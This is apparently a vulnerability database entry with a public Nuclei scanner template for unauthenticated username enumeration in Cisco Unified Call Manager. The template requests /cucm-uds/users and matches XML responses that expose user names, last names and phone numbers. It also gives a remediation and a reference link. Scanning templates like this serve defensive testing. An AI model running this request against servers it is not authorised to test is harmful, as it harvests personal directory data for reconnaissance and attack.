漏洞描述
Cisco Unified Call Manager is vulnerable to username enumeration.
cucm-username-enumeration: Cisco Unified Call Manager Username Enumeration
PoC代码[已公开]
id: cucm-username-enumeration
info:
name: Cisco Unified Call Manager Username Enumeration
author: manasmbellani
severity: medium
description: Cisco Unified Call Manager is vulnerable to username enumeration.
remediation: To mitigate this, enable Contact Search Authentication.
reference:
- https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/
metadata:
max-request: 1
tags: cisco,cucm,unauth,enum,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cucm-uds/users"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<userName>'
- '<lastName>'
- '<phoneNumber>'
condition: and
- type: dsl
dsl:
- contains(tolower(content_type), 'application/xml')
- contains(tolower(content_type), 'text/xml')
condition: or
# digest: 4a0a0047304502210092e1feee11a035214f821e5197307dcb334fb5ea625e6d2bf199770aba5514d6022062a94b24ac092c9079699928f2c08cde1899b002a2e8810040101a64ae3ea3ee:922c64590222798bb761d5b6d8e72950